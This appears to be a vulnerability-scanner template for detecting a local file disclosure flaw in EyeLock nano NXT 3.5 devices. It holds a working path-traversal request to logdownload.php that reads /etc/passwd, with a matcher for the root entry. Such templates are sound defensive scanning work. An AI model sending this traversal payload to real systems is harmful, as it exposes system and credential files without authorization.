id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Local File Disclosure
  author: geeknik
  severity: high
  description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
  reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
  tags: iot,lfi,eyelock

requests:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body